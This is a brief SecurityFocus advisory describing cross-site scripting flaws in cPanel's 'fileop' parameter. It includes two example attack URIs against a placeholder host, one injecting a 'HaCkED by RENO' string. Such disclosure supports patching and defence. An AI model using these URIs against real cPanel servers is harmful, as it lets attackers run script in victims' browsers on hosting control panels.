cPanel 'fileop' Parameter Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS

http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO


 

Privacy Statement
Copyright 2010, SecurityFocus